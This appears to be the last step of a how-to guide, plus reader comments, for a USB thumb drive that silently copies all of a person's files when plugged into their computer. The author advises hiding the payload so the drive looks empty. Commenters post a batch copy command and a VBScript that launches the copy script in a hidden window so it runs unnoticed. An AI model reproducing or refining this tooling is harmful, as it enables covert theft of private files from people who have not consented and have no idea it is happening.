Step 7Put all files in root of drive and try out
iImage Information

Now if you have not put all the files in the root of the flash drive it's time to do that now. One thing you can do is make all the files hidden, so for if some reason they look into the drive they will see an empty drive and not think anything. Now all you should have to do is plug into someones computer and let the thumb drive do its work after the LED is done flashing you should have all their files now. If for some reason it prompts for action just click the first one on the list then it will copy all files.
I would post a video if this in action but i am currently deployed to Iraq and bandwidth is very limited here if you have any questions or how i might make this Instructable better dont hesitate to mail me thanks and for looking
Thanks! This sounds great! I can't wait to try this out. But on the down side, I'll need to buy a usb.I already have one, but i like to use that for general purposes, not pranking stuff.
Thanks again, this is such a unique idea!
Do you think you could make the thumb drive pull a folder that you know only part of its name by adding a wild card ? strictly for example:
%backupcmd% "%USERPROFILE%\music" "%drive%\all\*SATS*
I cann't do it to be automatically taken action without click on it. I followed your instruction. Any suggestion for ,sir.
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "\all\copy.bat" & Chr(34), 0
Set WshShell = Nothing
then i saved it as invisible2.vbs
of course i had to change the launch.bat to:
@echo off
wscript.exe "\all\invisible2.vbs" & "copy.bat
The file.bat file worked perfectly, otherwise this is a very useful tool for system admins